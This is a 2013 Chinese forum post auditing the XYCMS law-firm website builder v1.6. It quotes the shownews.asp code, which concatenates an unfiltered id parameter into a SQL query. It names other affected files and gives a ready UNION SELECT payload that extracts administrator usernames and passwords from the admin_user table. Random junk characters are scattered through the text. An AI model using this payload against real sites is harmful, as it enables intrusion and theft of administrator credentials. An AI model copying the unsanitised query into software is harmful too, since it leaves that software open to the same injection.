前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似) z2 Q9 x/ n+ W) Y9 i7 p5 F F
^4 K) I. P/ a2 C7 C) J
淫荡分割线
4 B/ E7 `/ z2 ^# j' v$ d--------------------------------------------------------) s5 q8 V' Y: Y6 W( X
5 N! y) M! c& Y审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 J+ x2 A! Q, b4 i7 ~" w+ ?! ?源码地址:http://down.chinaz.com/soft/29233.htm3 ?7 a: B: M" z# [7 C( X& I, f
) K: s- Z, L# a5 ` D0 b# O. D漏洞文件:shownews.asp4 G2 w8 ~$ V0 I2 f- `( [( k
漏洞代码:7-13行
1 j% ?# a p D, E# b: ? 4 T8 ?; V: t ]" ]. ^* W5 C3 V
4 n+ C/ r9 z# e- q<%
, ~, |7 J: b' y" I# Q/ oid=request.QueryString("id")
) z/ a+ J1 R" s; h6 }3 v0 y 1 o& Q$ S, y: Q0 K5 x7 T, a
set snews=server.createobject("adodb.recordset") $ ^; n9 @+ `! y! V
exec="select * from [news] where id="&id& ]3 R9 v- K5 B7 J+ n2 T
snews.open exec,conn,1,10 f s% ^0 X' X ?9 S
%>
5 y. }2 V( S r# U* h$ n8 c G$ t
i* Z- T8 y6 j7 f5 y
4 m$ ^# f8 y a) k( D0 N* Y什么过滤都没有 直造成注入5 j$ l7 `# S; p) v* H9 _4 @
1 F3 o6 |4 g. m8 M9 V! O4 m9 F
注入点:http://127.0.0.1:99/shownews.asp?id=xx
0 t Z5 }8 g% a4 {4 A) z R2 r6 E" e : G3 D! c; G) M; m, x
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, S* e( i; ^" d2 w4 f0 h / T8 V; z7 E. n3 C* q
$ e! y1 j% s, ^6 fexp: union select 1,admin,password,4,5,7 from admin_user
( h- A- B+ \5 F0 w/ f
: n0 k! G2 y3 ^2 s [ |
发表于 2013-4-4 17:28:12
收藏
支持
反对